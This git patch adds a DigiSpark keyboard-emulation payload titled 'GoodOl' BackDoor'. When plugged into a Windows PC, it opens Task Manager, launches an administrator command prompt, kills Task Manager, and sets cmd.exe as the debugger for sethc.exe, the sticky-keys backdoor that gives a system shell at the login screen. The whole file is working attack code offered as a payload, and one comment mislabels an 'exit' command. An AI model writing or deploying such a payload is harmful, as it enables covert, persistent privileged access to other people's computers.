From 12746cda0b914063ab71740d32bbddcf7b1477f9 Mon Sep 17 00:00:00 2001 From: Muhammad Talha Khan Date: Fri, 31 May 2019 23:32:53 +0500 Subject: [PATCH] Create GoodOl' BackDoor --- payloads/BackDoor/GoodOl' BackDoor | 36 ++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 payloads/BackDoor/GoodOl' BackDoor diff --git a/payloads/BackDoor/GoodOl' BackDoor b/payloads/BackDoor/GoodOl' BackDoor new file mode 100644 index 0000000..8a39b70 --- /dev/null +++ b/payloads/BackDoor/GoodOl' BackDoor @@ -0,0 +1,36 @@ +#include "DigiKeyboard.h" +#define KEY_TAB 0x2b +void setup() { + pinMode(1, OUTPUT); //LED on Model A +} + +void loop() { + + DigiKeyboard.update(); + DigiKeyboard.sendKeyStroke(0); + DigiKeyboard.delay(3000); + + DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run + DigiKeyboard.delay(200); + DigiKeyboard.println("taskmgr"); //starting taskmgr + DigiKeyboard.delay(1000); + DigiKeyboard.sendKeyStroke(KEY_F, MOD_ALT_LEFT); + DigiKeyboard.sendKeyStroke(KEY_N);//run + DigiKeyboard.delay(1000); + DigiKeyboard.print("cmd /k mode con: cols=15 lines=1");//start cmd + DigiKeyboard.sendKeyStroke(KEY_TAB); + DigiKeyboard.sendKeyStroke(KEY_SPACE);//turn on admin privileges + DigiKeyboard.sendKeyStroke(KEY_ENTER); //run + DigiKeyboard.delay(500); + DigiKeyboard.println("taskkill /IM \"taskmgr.exe\" /F ");//killing taskmanager + DigiKeyboard.delay(500); + DigiKeyboard.println(F("REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\""));//adding backdoor + DigiKeyboard.delay(500); + DigiKeyboard.println("exit");//adding created user to remote desktop group + DigiKeyboard.delay(500); + digitalWrite(1, HIGH); //turn on led when program finishes + DigiKeyboard.delay(90000); + digitalWrite(1, LOW); + DigiKeyboard.delay(5000); + +}